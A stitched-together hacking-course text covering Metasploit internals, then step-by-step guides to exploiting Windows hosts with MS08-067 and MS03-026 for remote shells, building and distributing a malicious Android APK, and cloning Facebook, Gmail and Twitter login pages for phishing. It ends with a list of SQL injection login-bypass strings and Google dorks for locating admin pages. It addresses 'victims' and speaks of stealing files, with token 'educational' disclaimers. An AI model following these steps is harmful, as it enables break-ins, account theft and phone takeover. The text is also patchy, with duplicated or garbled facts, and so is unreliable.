  self = {Msf::Modules::Mod6578706c6f69742f77696e646f77732f6674 (truncated in the display) 
    @active_timeout = 120 
    @arch = Empty Array 
    @author = Array (1 element) 
    @autofilter_ports = Array (2 elements) 
    @autofilter_services = Array (1 element) 
    @banner = "220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready 
    @datastore = {Msf::ModuleDataStore} Msf::ModuleDataStore (20 elements) 
    @default_target = nil 
    @fail_reason = "none" 
    @ftpbuff = "" 

Watches pane: 

  buf = (NameError (truncated in the display) 

[screenshot: Console Debugger stopped inside disconnect. Frames pane, Thread 1 [sleep] (pid 1227):] 

  disconnect [tcp.rb:179] (Msf::Exploit::Remote::Tcp) 
  exploit [warftpd_165_user.rb:96] (Metasploit3) 
  job_run_proc [exploit_driver.rb:206] (Msf::ExploitDriver) 
  run [exploit_driver.rb:166] (Msf::ExploitDriver) 
  exploit_simple [exploit.rb:137] (Msf::Simple::Exploit) 
  exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  run_command [dispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 
  msfconsole:148 
Establish Session - 

[screenshot: Console Debugger stopped inside cmd_sessions. Frames pane, Thread 1 [sleep] (pid 1810):] 

  cmd_sessions [core.rb:1440] (Msf::Ui::Console::CommandDispatcher::Core) 
  run_command [dispatcher_shell.rb:428] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:390] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 
  cmd_exploit [exploit.rb:181] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  cmd_exploit [exploit.rb:181] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  run_command [dispatcher_shell.rb:428] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:390] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 
  msfconsole:148 

Interact With Target 

[screenshot: Variables and Watches panes for the exploit module:] 

  Global variables 
  buf = (NameError (truncated in the display) 
  IOError = {Class} IOError 
  nsock = {Socket} #<Socket:0x007fc33d8d4278> 
  self = {Msf::Modules::Mod6578706c6f69742f77696e646f77732f6674 (truncated in the display) 
    @active_timeout = 120 
    @arch = Empty Array 
    @author = Array (1 element) 
    @autofilter_ports = Array (2 elements) 
    @autofilter_services = Array (1 element) 
    @banner = "220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready 
    @datastore = {Msf::ModuleDataStore} Msf::ModuleDataStore (20 elements) 
    @default_target = nil 
    @fail_reason = "none" 
    @ftpbuff = "" 

Variables pane inside cmd_sessions: 

  $! = nil 
  Exception = {Class} Exception 
  Interrupt = {Class} Interrupt 
  @@sessions_opts = {Rex::Parser::Arguments} #<Rex::Parser::Arguments: (truncated in the display) 
  args = Array (3 elements) 
  cmds = Empty Array 
  EOFError = {Class} EOFError 
  extra = Empty Array 
  Global variables 
  IOError = {Class} IOError 
  method = nil 
  Msf::Sessions::CommandShell = {Class} Msf::Sessions::CommandShell 
  Msf::Sessions::Meterpreter = {Class} Msf::Sessions::Meterpreter 
  quiet = false 

Watches pane: 

  buf = (NameError (truncated in the display) 
Meterpreter - 

The type of payload we discussed in the previous section gives us a command shell, which can provide some useful 
commands but has a number of limitations. These include: 

■ The creation of a new process, which can trigger an intrusion detector 

■ A limit on the number of commands available 

■ It can't work in a chroot environment 

As well as overcoming these limitations, Meterpreter also has the facility to allow the attacker to extend its 
functionality, which can provide the attacker with an arsenal of weapons. 

Meterpreter can be divided into a number of components. These include: Meterpreter payloads, client-side components, 
server-side components, server extensions, and the protocol connecting the client side and the server side. 



Meterpreter payloads - 

Meterpreter payloads are staged. The stage part of the payload can be found in 
/modules/payloads/stages/windows/meterpreter.rb, while for the stager we have a choice of bind_tcp or reverse_tcp. For 
our analysis we will choose the bind_tcp stager. 

So for the windows/meterpreter/bind_tcp payload we have the stage /modules/payloads/stages/windows/meterpreter.rb and 
the stager /modules/payloads/stagers/windows/bind_tcp.rb, and the stager is controlled by its corresponding script in 
/lib/msf/core/handler/bind_tcp.rb. 
[Debugger screenshot: the call stack (Thread 1, pid 583) at the moment the windows/meterpreter/bind_tcp payload is instantiated, innermost frame first:] 

initialize [handler.rb:75] (Msf::Handler) 
initialize [bind_tcp.rb:38] (Msf::Handler::BindTcp) 
initialize [windows.rb:32] (Msf::Payload::Windows) 
initialize [bind_tcp.rb:59] (Metasploit3) 
initialize [reflectivedllinject.rb:41] (Msf::Payload::Windows::ReflectiveDllInject) 
initialize [meterpreter_options.rb:13] (Msf::Sessions::MeterpreterOptions) 
initialize [meterpreter.rb:39] (Metasploit3) 
create [module_set.rb:62] (Msf::ModuleSet) 
create [module_manager.rb:89] (Msf::ModuleManager) 
exploit_simple [exploit.rb:84] (Msf::Simple::Exploit) 
exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 
cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
run_command [dispatcher_shell.rb:428] (Rex::Ui::Text::DispatcherShell) 
run_single [dispatcher_shell.rb:390] (Rex::Ui::Text::DispatcherShell) 
run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 
run [shell.rb:200] (Rex::Ui::Text::Shell) 
msfconsole:148 

[Variables pane: the payload's info hash (14 elements), including 'Name' = "Windows Meterpreter (Reflective Injection), Bind TCP Stager", 'Description' = "Listen for a connection, Inject the meterpreter server", 'Handler' = Msf::Handler::BindTcp, 'Session' = Msf::Sessions::Meterpreter_x86_Win, 'Convention' = "sockedi", and the 'Arch', 'Author', 'License', 'PayloadCompat', 'Platform', 'References', 'Stage', 'Stager' and 'Version' entries; self is an anonymous class instance. No watches.] 

Msfconsole Commands - 

back - Move back from the current context 
banner - Display an awesome metasploit banner 
cd - Change the current working directory 
color - Toggle color 
connect - Communicate with a host 
edit - Edit the current module with $VISUAL or $EDITOR 
exit - Exit the console 
get - Gets the value of a context-specific variable 
getg - Gets the value of a global variable 
go_pro - Launch Metasploit web GUI 
grep - Grep the output of another command 
help - Help menu 
info - Displays information about one or more modules 
irb - Drop into irb scripting mode 
jobs - Displays and manages jobs 
kill - Kill a job 
load - Load a framework plugin 
loadpath - Searches for and loads modules from a path 
makerc - Save commands entered since start to a file 
popm - Pops the latest module off the stack and makes it active 
previous - Sets the previously loaded module as the current module 
pushm - Pushes the active or list of modules onto the module stack 
quit - Exit the console 
reload_all - Reloads all modules from all defined module paths 
rename_job - Rename a job 
resource - Run the commands stored in a file 
route - Route traffic through a session 
save - Saves the active datastores 
search - Searches module names and descriptions 
sessions - Dump session listings and display information about sessions 
set - Sets a context-specific variable to a value 
setg - Sets a global variable to a value 
show - Displays modules of a given type, or all modules 
sleep - Do nothing for the specified number of seconds 
spool - Write console output into a file as well as the screen 
threads - View and manipulate background threads 
unload - Unload a framework plugin 
unset - Unsets one or more context-specific variables 
unsetg - Unsets one or more global variables 
use - Selects a module by name 
version - Show the framework and console library version numbers 

Back - 

msf auxiliary(ms09_001_write) > back 
msf > 


Banner - 

msf > banner 

[ASCII-art Metasploit logo, not reproduced] 

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with 
Metasploit Pro - type 'go_pro' to launch it now. 

       =[ metasploit v4.11.4-2015071402 ] 
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ] 
+ -- --=[ 432 payloads - 37 encoders - 8 nops ] 

Check - 

msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   RHOST    172.16.194.134   yes       The target address 
   RPORT    445              yes       Set the SMB service port 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic Targeting 

msf exploit(ms08_067_netapi) > check 

[*] Verifying vulnerable status... (path: 0x0000005a) 
[*] System is not vulnerable (status: 0x00000000) 
[*] The target is not exploitable. 
msf exploit(ms08_067_netapi) > 

Color - 

msf > color 

Usage: color <'true'|'false'|'auto'> 
Enable or disable color output 


Connect - 

msf > connect 192.168.1.1 23 

[*] Connected to 192.168.1.1:23 

DD-WRT v24 std (c) 2008 NewMedia-NET GmbH 
Release: 07/27/08 (SVN revision: 10011) 

DD-WRT login: 


Exit - 

msf exploit(ms10_061_spoolss) > exit 
root@kali:~# 


Payloads - 

msf exploit(ms08_067_netapi) > show payloads 


Targets - 

msf exploit(ms08_067_netapi) > show targets 

Exploit targets: 

   Id  Name 
   --  ---- 
   0   Automatic Targeting 
   1   Windows 2000 Universal 
   10  Windows 2003 SP1 Japanese (NO NX) 
   11  Windows 2003 SP2 English (NO NX) 
   12  Windows 2003 SP2 English (NX) 
   ...snip... 

1. PC Hacking 

Step 1: First we are going to port scan the computer. For this we need to open Nmap and type the following command. 

nmap -sS -O <ip> 

In the place of <ip> you have to write the victim's IP address. If you see ports 139 and 445 open then you can go ahead. 

Step 2: Now we have to open Metasploit (via the terminal) and run it. 

Type the following command to get the exploits in the victim's computer. 

show exploits 

You will get a list of exploits in the victim's computer, with names that look similar to ms05_039_pnp. Every such exploit 
corresponds to a different function. We are interested in the exploit called ms08_067_netapi, so we give the 
command shown below. 

use windows/smb/ms08_067_netapi 

Step 3: Now we use the RHOST option to set the target IP. 

set RHOST <ip> 

And the RPORT option to access port 445. 

set RPORT 445 

Step 4: Now we give the command 

set SMBPIPE SRVSVC 

And then, 

set TARGET 0 

Step 5: Now we have to set the payload, hence the following command. 

set PAYLOAD windows/meterpreter/bind_tcp 

Step 6: Time for the BIG BANG...! Type exploit and hit enter. 

If you see a message that looks like "Meterpreter session 1 opened" then that implies you are done. You have 
successfully hacked into the computer. 

Now by using different commands we can steal the files on that system! 


2. Smartphone Hacking - 

Requirements: 

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) 

2. Android smartphone (we use an HTC One running Android 4.4 KitKat) 

Step by Step Hacking Android Smartphone Tutorial using Metasploit: 

1. Open a terminal (CTRL + ALT + T); see the tutorial on how to create a Linux keyboard shortcut. 

2. We will utilize the Metasploit payload framework to create the exploit for this tutorial. 

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> 

As described above, the attacker IP address is 192.168.8.94; below is our screenshot of the command being executed. 

3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker machine, the attacker needs 
to set up a handler for incoming connections on the port already specified above. Type msfconsole to go to the 
Metasploit console. 

Info: 

use exploit/multi/handler -> we will use the Metasploit handler 

set payload android/meterpreter/reverse_tcp -> make sure the payload is the same as in step 2 

4. The next step is to configure the switches for the Metasploit payload we already specified in step 3. 

Info: 

set lhost 192.168.8.94 -> attacker IP address 

set lport 443 -> port to listen on for the reverse connection 

exploit -> start listening for incoming connections 

5. The attacker already has the APK file and now he will start to distribute it (I don't need to describe how to distribute this file; 
the internet is a good place for distribution). 

6. Short story: the victim (me myself) downloads the malicious APK file and installs it. After the victim opens the application, 
the attacker's Metasploit console gets something like this: 

7. This means that the attacker is already inside the victim's Android smartphone and he can do everything with the victim's phone. 


26. Backtrack Basic 


Android Exploitation with Metasploit 

In this article, we will be looking into the practical usage of Backtrack and its tools. The article is 
divided into three sections - Android Exploitation through Metasploit, Nikto Vulnerability Scanner and 
w3af. The reader is expected to have basic knowledge of Backtrack and to be familiar with common web application 
vulnerabilities. 


Use Metasploit in Backtrack 5 

Metasploit comes in several flavors: Metasploit framework, Metasploit community edition and Metasploit 
pro. In Backtrack 5, Metasploit framework is installed by default. Metasploit framework provides you with 
information on security vulnerabilities which can be used to exploit a system. Penetration testers can also use this 
tool to launch manual or automated scans. 


BackTrack 5 Toolkit Tutorial 

BackTrack is an operating system based on the Ubuntu GNU/Linux distribution aimed at digital forensics and 
penetration testing use. It is named after backtracking, a search algorithm. The current version is BackTrack 5, 
code name "Revolution." 

What is a vulnerable system? 

A vulnerability is a weakness in software or hardware that enables the attacker to compromise the confidentiality, 
integrity or availability of that system. A system can be, but is not limited to: a server running an operating 
system, a router, switch, firewall, mobile device, TV, etc. 

For example: when an attacker launches a distributed denial of service attack, he causes the unavailability 
of a system. If data is intercepted and changed, he compromises its integrity. An attacker can use a vulnerability to compromise a 
system. For example, a weakness in a protocol allows the attacker to run arbitrary code. The attacker launches the exploit on the 
vulnerable system. Based on the actual payload sent together with the exploit, the attacker receives a (reverse) 
shell. If you understand the vulnerability, it will help you to implement the appropriate security control. A security 
control can be a patch or a security device. It is important that you understand the vulnerability context: 

• Where do they exist? 

• Where do they run? 

So, what is the exploit context? 

• The exploit runs where the vulnerability exists 

• Where does it run, client side or server side? 


Example 1 

Let's say you have a server located in the DMZ. The vulnerability context is the server itself and the 
exploit context is the DMZ. If an attacker can compromise a vulnerable server in the DMZ, he probably has 
access to all servers in that DMZ. The attacker can use other techniques like pivoting to 
access servers in the internal network. 


Example 2 

If a client computer is placed on a client LAN, the vulnerability context is the client and the exploit context 
is the client LAN. If an attacker can compromise a vulnerable client in the LAN, he probably has access to all 
resources on the client LAN. 


Client-side exploit 

If a vulnerability exists on a client, it can be compromised by a client-side exploit. Client-side vulnerabilities live 
in Java, the operating system, and applications such as the web browser, Office and Acrobat Reader. The attack is basically 
launched by tricking the user into clicking on a link embedded in an email, or by sending the user an attachment which 
contains the exploit. When the user clicks on the link, the user is redirected to a website which contains the actual 
code to launch the exploit. A traditional firewall does not stop this attack from happening, since the user opens 
a connection over port 443 or port 80. These ports are usually allowed on the firewall. Before a system can be 
exploited, you can take the following steps: 

• Choose and configure the module in Metasploit 

• Select a payload, which provides the attacker with a remote shell 


BackTrack 5 

BackTrack 5 (BT5) is a Linux security distribution that contains all of the tools necessary to perform 
a complete security assessment of systems, networks, and applications. This article will describe 
some basic practical uses of the tools within BackTrack 5 as they relate to a network-based penetration test or 
security assessment. BackTrack 5 was designed with penetration testing in mind. A pentest is a method of 
evaluating and testing the security of a system, network, or application by performing actions that are meant to 
simulate the actions of a malicious attacker. 

The tools included in BackTrack 5 are very often the same tools an attacker might be using against 
a network, and understanding these tools and how effective they might be against your network is an 
important step of security in-depth. The tools covered in this two-part article and their usage will be outlined 
in the same order that a network assessment might take place, starting with host discovery and information 
gathering on discovered targets, moving on to identifying vulnerabilities within your targets, followed by attempting 
exploitation of the discovered vulnerabilities, and finally, what to do with your newly gained access, also known 
as post-exploitation. Web application assessment tools will be covered as well. 

The first part of the article will cover the basics of BackTrack 5, simple host discovery and information 
gathering of an internal network, as well as a basic wireless assessment. Part two will cover the steps 
of discovery and information gathering for an external network assessment, as well as vulnerability 
assessment, exploitation, and post-exploitation. Some other useful tools will be covered as well. Keep in mind 
that there are many tools available in BT5 and many of their functions can overlap, and the information in this 
article doesn't encompass all of the ways, nor the only way to perform these actions. Use this information as a 
starting point to discover the real capabilities of the toolkit. The version of BT5 used in this article is 
BackTrack 5 R2 KDE 64-bit and there may be slight differences in commands and available applications if you 
are using a different version. 


BackTrack 5 Basics 

There are a few different ways BT5 can be set up and used. You can create a Live CD or bootable USB drive 
and run it in a live environment, install BT5 to a virtual machine (VM), or install BT5 directly to a hard drive 
and boot to it as the main OS. Each method has its perks and drawbacks, but for the sake of continually 
performing assessments and testing, creating a BT5 VM is recommended. If you are new to BT5, the in-depth 
details of setting up BT5 will not be covered in this article; however, the Official BackTrack 5 Wiki and 
Forums at http://www.backtrack-linux.org/ contain all the information necessary for getting started. 

Once you are up and running, before starting any information gathering, you should create a place to 
store the information you are collecting. Some of the tools in BT5 utilize databases to store information and 
one of the strengths of BT5 is that the databases should be preinstalled and configured to start using without 
much hassle. Since the context of this article covers pentesting of multiple clients, creating a separate folder 
for each client is recommended. For this assessment, everything will be stored in subfolders in the ~/PenTest 
directory, created for this demonstration. 


History 

Backtrack Linux is a custom Linux distribution designed to aid security professionals with attack simulation, 
vulnerability identification and verification, and general penetration testing activities. Backtrack was the end 
result of a combination of two separate (competing) security distributions. WHAX (formerly Whoppix), a 
security distro developed by Mati Aharoni, and Auditor Security Collection, developed by Max Moser, were 
combined to create Backtrack. 

Backtrack version 4 and up are based on Ubuntu. 

The most recent release, as of this writing, is Backtrack 5 R2 which runs a customized 3.2.6 Linux Kernel. This 
release touts many new tools and improvements, some of those being better support for wireless attacks, the 
Metasploit Community Edition (4.2.0) and version 3.0 of the Social Engineering Toolkit. You can see more of the 
tools and release info here: http://www.backtrack-linux.org/backtrack/backtrack-5-r2-released/. 

You can download the latest (along with earlier releases) Backtrack release in ISO or VMware image 
formats from http://www.backtrack-linux.org. 

It is true that most of the tools that come bundled within Backtrack can be downloaded separately and 
do not require Backtrack to run. What makes Backtrack an ideal tool is that its entire environment is set up 
with security testing in mind. From the tools, scripts, dependencies, libraries and system configurations, 
every aspect of the end user experience in Backtrack has been set up to enable the user to perform security 
testing quickly, with limited to no configuration having to be made, since Backtrack is set up in a "turn key" 
fashion. 

I won’t say that Backtrack is the only OS I run during 
penetration tests. I usually have several systems going. 
But, I always have at least a Backtrack VM running 
because if I need a tool, and I don’t have Internet access 
to download it or I don’t have the time to configure it on a 
machine, more often than not it’s sitting on my Backtrack 
VM, ready to go with no configuration required. Similarly, 
when in a security analyst (defensive) role, having quick 
access to the pre-configured Backtrack environment 
reaps similar benefits when on a pen test and when 
needing to perform quick network analysis, or verify a 
vulnerability. 


How To Hack Facebook Via Backtrack 5 

Step By Step - 

1. Type "msfconsole" 
2. cd /pentest/exploits/set 
3. ./set 
4. Now just select the 1st option (1 Social-Engineering Attacks) and hit enter 
5. After that hit enter on the 2nd number 
6. Now just select the 4th option "Tabnabbing Attack Method" and hit ENTER 
7. Then select the 2nd option "Site Cloner" and hit ENTER 
8. Now here you need to add the URL of Facebook and just hit enter 
9. Open a new terminal, type ifconfig and hit ENTER 
10. Now just copy this IP address and open it in a browser. 
11. Done 

Note: This tutorial is for educational purposes only. 


How To Hack Gmail Via Backtrack 5 

Step By Step - 

1. Type "msfconsole" 
2. cd /pentest/exploits/set 
3. ./set 
4. Now just select the 1st option (1 Social-Engineering Attacks) and hit enter 
5. After that hit enter on the 2nd number 
6. Now just select the 4th option "Tabnabbing Attack Method" and hit ENTER 
7. Then select the 2nd option "Site Cloner" and hit ENTER 
8. Now here you need to add the URL of Gmail and just hit enter 
9. Open a new terminal, type "ifconfig" and hit ENTER 
10. Now just copy this IP address and open it in a browser. 
11. Done 

Note: This tutorial is for educational purposes only. 


How To Hack Twitter Via Backtrack 5 

Step By Step - 

1. Type "msfconsole" 
2. cd /pentest/exploits/set 
3. ./set 
4. Now just select the 1st option (1 Social-Engineering Attacks) and hit enter 
5. After that hit enter on the 2nd number 
6. Now just select the 4th option "Tabnabbing Attack Method" and hit ENTER 
7. Then select the 2nd option "Site Cloner" and hit ENTER 
8. Now here you need to add the URL of Twitter and just hit enter 
9. Open a new terminal, type ifconfig and hit ENTER 
10. Now just copy this IP address and open it in a browser. 
11. Done 

Note: This tutorial is for educational purposes only. 


How To Hack Windows Xp Via Backtrack 5 

Step By Step - 

1. Open a terminal and type "msfconsole" 
2. msf > search dcom 
3. msf > use exploit/windows/dcerpc/ms03_026_dcom 
4. msf > show options 
5. msf > set RHOST 10.0.0.3 
6. msf > show payloads 
7. msf > set PAYLOAD generic/shell_reverse_tcp 
8. msf > set LHOST 10.0.0.6 
9. msf > exploit 
10. Open a shell on the hacked system 
11. sessions -i 1 
12. C:\>dir 


27. SQL Server, Oracle Server Basic 


What is SQL? 

SQL is Structured Query Language, which is a computer language for storing, manipulating and retrieving data 
stored in a relational database. 

SQL is the standard language for Relational Database Systems. All relational database management systems like 
MySQL, MS Access, Oracle, Sybase, Informix, Postgres and SQL Server use SQL as their standard database 
language. They do, however, use different dialects, such as: 

■ MS SQL Server uses T-SQL, 

■ Oracle uses PL/SQL, 

■ The MS Access version of SQL is called JET SQL (native format), etc. 


Why SQL? 

■ Allows users to access data in relational database management systems. 

■ Allows users to describe the data. 

■ Allows users to define the data in a database and manipulate that data. 

■ Allows SQL to be embedded within other languages using SQL modules, libraries & pre-compilers. 

■ Allows users to create and drop databases and tables. 

■ Allows users to create views, stored procedures and functions in a database. 

■ Allows users to set permissions on tables, procedures and views. 


History: 

■ 1970 -- Dr. E. F. "Ted" Codd of IBM is known as the father of relational databases. He described a relational model 
for databases. 

■ 1974 -- Structured Query Language appeared. 

■ 1978 -- IBM worked to develop Codd's ideas and released a product named System/R. 

■ 1986 -- IBM developed the first prototype of a relational database, which was standardized by ANSI. The first relational 
database was released by Relational Software, which later became Oracle. 


SQL Process: 

When you are executing an SQL command for any RDBMS, the system determines the best way to carry out 
your request and the SQL engine figures out how to interpret the task. 

There are various components included in the process. These components are the Query Dispatcher, Optimization 
Engines, Classic Query Engine and SQL Query Engine, etc. The classic query engine handles all non-SQL queries, 
but the SQL query engine won't handle logical files. 


What is an RDBMS? 

RDBMS stands for Relational Database Management System. RDBMS is the basis for SQL and for all modern 
database systems like MS SQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access. 

A Relational database management system (RDBMS) is a database management system (DBMS) that is based 
on the relational model as introduced by E. F. Codd. 


What is a table? 

The data in an RDBMS is stored in database objects called tables. A table is a collection of related data entries 
and it consists of columns and rows. 

MySQL 

MySQL is an open source SQL database, which is developed by the Swedish company MySQL AB. MySQL is 
pronounced "my ess-que-ell," in contrast with SQL, pronounced "sequel." 

MySQL supports many different platforms including Microsoft Windows, the major Linux distributions, UNIX, 
and Mac OS X. 

MySQL has free and paid versions, depending on its usage (non-commercial/commercial) and features. MySQL 
comes with a very fast, multi-threaded, multi-user, and robust SQL database server. 


History: 

■ Development of MySQL by Michael Widenius & David Axmark began in 1994. 

■ First internal release on 23 May 1995. 

■ Windows version was released on 8 January 1998 for Windows 95 and NT. 

■ Version 3.23: beta from June 2000, production release January 2001. 

■ Version 4.0: beta from August 2002, production release March 2003 (unions). 

■ Version 4.01: beta from August 2003, Jyoti adopts MySQL for database tracking. 

■ Version 4.1: beta from June 2004, production release October 2004. 

■ Version 5.0: beta from March 2005, production release October 2005. 

■ Sun Microsystems acquired MySQL AB on 26 February 2008. 

■ Version 5.1: production release 27 November 2008. 

Features: 

■ High Performance. 

■ High Availability. 

■ Scalability and Flexibility: Run anything. 

■ Robust Transactional Support. 

■ Web and Data Warehouse Strengths. 

■ Strong Data Protection. 

■ Comprehensive Application Development. 

■ Management Ease. 

■ Open Source Freedom and 24 x 7 Support. 

■ Lowest Total Cost of Ownership. 

MS SQL Server 

MS SQL Server is a Relational Database Management System developed by Microsoft Inc. Its primary query 
languages are: 

■ T-SQL. 

■ ANSI SQL. 


History: 

■ 1987 - Sybase releases SQL Server for UNIX. 

■ 1988 - Microsoft, Sybase, and Ashton-Tate port SQL Server to OS/2. 

■ 1989 - Microsoft, Sybase, and Ashton-Tate release SQL Server 1.0 for OS/2. 

■ 1990 - SQL Server 1.1 is released with support for Windows 3.0 clients. 

■ Ashton-Tate drops out of SQL Server development. 

■ 2000 - Microsoft releases SQL Server 2000. 

■ 2001 - Microsoft releases XML for SQL Server Web Release 1 (download). 

■ 2002 - Microsoft releases SQLXML 2.0 (renamed from XML for SQL Server). 

■ 2002 - Microsoft releases SQLXML 3.0. 

Features: 

■ High Performance. 

■ High Availability. 

■ Database mirroring. 

■ Database snapshots. 

■ CLR integration. 

■ Service Broker. 

■ DDL triggers. 

■ Ranking functions. 

■ Row version-based isolation levels. 

■ XML integration. 

■ TRY...CATCH. 

■ Database Mail. 

ORACLE 

It is a very large, multi-user database management system. Oracle is a relational database management 
system developed by Oracle Corporation. 

Oracle works to efficiently manage its resource, a database of information, among the multiple clients requesting 
and sending data in the network. 

It is an excellent database server choice for client/server computing. Oracle supports all major operating 
systems for both clients and servers, including MSDOS, NetWare, UnixWare, OS/2 and most UNIX flavors. 


History: 

Oracle began in 1977 and is celebrating 32 years in the industry (from 1977 to 2009). 

■ 1977 - Larry Ellison, Bob Miner and Ed Oates founded Software Development Laboratories to undertake 
development work. 

■ 1979 - Version 2.0 of Oracle was released and it became the first commercial relational database and first SQL 
database. The company changed its name to Relational Software Inc. (RSI). 

■ 1981 - RSI started developing tools for Oracle. 

■ 1982 - RSI was renamed to Oracle Corporation. 

■ 1983 - Oracle released version 3.0, rewritten in the C language, which ran on multiple platforms. 

■ 1984 - Oracle version 4.0 was released. It contained features like concurrency control - multi-version read 
consistency, etc. 

■ 1985 - Oracle version 4.0 was released. It contained features like concurrency control - multi-version read 
consistency, etc. 

■ 2007 - Oracle released Oracle 11g. The new version focused on better partitioning, easy migration, etc. 


Features: 

■ Concurrency 

■ Read Consistency 

■ Locking Mechanisms 

■ Quiesce Database 

■ Portability 

■ Self-managing database 

■ SQL*Plus 

■ ASM 

■ Scheduler 

■ Resource Manager 

■ Data Warehousing 

■ Materialized views 

■ Bitmap indexes 

■ Table compression 

■ Parallel Execution 

■ Analytic SQL 

■ Data mining 

■ Partitioning 

28. SQL Injection 


Common vulnerabilities 

SQL Injection 

1. Browser sends malicious input to server 

2. Bad input checking leads to malicious SQL query 

XSS - Cross-site scripting 

1. Bad web site sends innocent victim a script that steals information from an honest web site 

CSRF - Cross-site request forgery 

1. Bad web site sends request to good web site, using credentials of an innocent victim who "visits" site 

Other problems 

HTTP response splitting, bad certificates, ... 


General code injection attacks 

1. Enable attacker to execute arbitrary code on the server 

2. Example: code injection based on eval (PHP) 
http://site.com/calc.php (server side calculator) 

$in = $_GET['exp']; 
eval('$ans = ' . $in . ';'); 

Attack: http://site.com/calc.php?exp=" 10 ; system('rm *.*') " 

(URL encoded) 


Code injection using system() 

Example: PHP server-side code for sending email 

$email = $_POST["email"]; 
$subject = $_POST["subject"]; 
system("mail $email -s $subject < /tmp/joinmynetwork"); 

Attacker can post 

http://yourdomain.com/mail.php ? 
email=hacker@hackerhome.net & 
subject=foo < /usr/passwd; 


Database queries with PHP 

(the wrong way) 

Sample PHP 

$recipient = $_POST['recipient']; 
$sql = "SELECT PersonID FROM People WHERE Username='$recipient'"; 
$rs = $db->executeQuery($sql); 


Problem - 

Untrusted user input 'recipient' is embedded directly into the SQL command 
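The wrong-way query beside its parameterised form, as an added example that is not code from the original notes: Python's sqlite3 stands in for the PHP $db->executeQuery() call, and the People table, its rows and the inputs are constructed here for the demonstration.

```python
"""Untrusted input embedded in SQL versus a parameterised query.

Added example, not part of the original notes; Python's sqlite3 stands in for
the PHP $db->executeQuery() call. The People table, its rows and the inputs
below are constructed for the demonstration.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Build an in-memory People table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE People (PersonID INTEGER, Username TEXT)")
    conn.executemany(
        "INSERT INTO People VALUES (?, ?)",
        [(1, "alice"), (2, "bob"), (3, "carol")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, recipient: str) -> List[int]:
    """The wrong way: the same string concatenation as the PHP sample.

    Whatever the user typed becomes part of the SQL text, so a quote
    character in `recipient` ends the string literal and the rest of the
    input is parsed as SQL.
    """
    sql = "SELECT PersonID FROM People WHERE Username='" + recipient + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, recipient: str) -> List[int]:
    """The fix: a parameterised query.

    The SQL text is fixed and `recipient` is handed to the engine as a bound
    value, never parsed as SQL, so quotes in it cannot change the query.
    """
    sql = "SELECT PersonID FROM People WHERE Username=?"
    return [row[0] for row in conn.execute(sql, (recipient,))]


def compare(recipient: str) -> Tuple[List[int], List[int]]:
    """Run both lookups on the same input and return (unsafe, safe) results."""
    conn = make_db()
    try:
        return lookup_unsafe(conn, recipient), lookup_safe(conn, recipient)
    finally:
        conn.close()


if __name__ == "__main__":
    # A normal username behaves the same either way.
    print(compare("bob"))          # ([2], [2])
    # The classic ' OR '1'='1 input: the unsafe query becomes
    # WHERE Username='' OR '1'='1', which matches every row; the safe query
    # looks for a user literally named ' OR '1'='1 and finds nobody.
    print(compare("' OR '1'='1"))  # ([1, 2, 3], [])
```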


Note - 

The best sql injection software is Havij 

If you want to log in to any website, please follow these steps: 

1. Type in the user field: ' OR '1'='1 

2. Type in the password field: ' OR '1'='1 


Other Injection Queries: 

(' or 1=1--) 

(1' or '1'='1) 

(admin'--) 

(" or 0=0 --) 

(or 0=0 --) 

(' or 0=0 #) 

(" or 0=0 #) 

(or 0=0 #) 

(' or 'x'='x) 

(" or "x"="x) 

{ ') or ('x'='x } 

(' or 1=1--) 

(" or 1=1--) 

(or 1=1--) 

(' or a=a--) 

(" or "a"="a) 

{ ') or ('a'='a } 

{ ") or ("a"="a } 

(hi" or "a"="a) 

(hi" or 1=1--) 

(hi' or 1=1--) 

(hi' or 'a'='a) 

{ hi') or ('a'='a } 

{ hi") or ("a"="a } 


How to find any website login page - 

Type in Google: 

1. inurl:adminlogin.aspx 

2. inurl:admin/index.php 

3. inurl:administrator.php 

4. inurl:administrator.asp 

5. inurl:login.asp 

6. inurl:login.aspx 

7. inurl:login.php 


29. Routers 


Routers - 

• Data is sent in the form of packets between two end devices 

• Routers are used to direct packets to their destination 

• Routers examine a packet's destination IP address and 
determine the best path by using a routing table 

